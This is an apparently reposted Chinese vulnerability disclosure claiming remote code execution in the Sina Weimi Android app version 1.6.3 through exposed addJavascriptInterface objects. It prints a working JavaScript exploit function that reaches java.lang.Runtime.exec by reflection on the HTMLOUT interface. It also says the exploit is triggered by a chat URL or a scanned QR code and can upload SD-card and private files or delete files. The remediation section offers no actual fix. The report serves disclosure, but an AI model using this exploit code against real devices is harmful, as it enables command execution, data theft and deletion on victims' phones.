惊喜,微米最新版本1.6.3 app中枪了.
add Java scriptInterface导出多处
构造exploit部分内容如下:( html 文件)
function execute(cmdArgs) { alert(typeof(HTMLOUT)); return HTMLOUT.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs); }
或者其实现中文版http://drops.wooyun.org/papers/548 发url聊天信息或者扫url二维码即可
这个是已知问题了,调用后可以执行命令,可以做很多事情,例如上传sd卡文件,上传私有目录下的可读文件、删除文件等等。 修复方案: 你们最专业
查看更多关于新浪微米手机客户端远程代码执行 - 网站安全的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did15728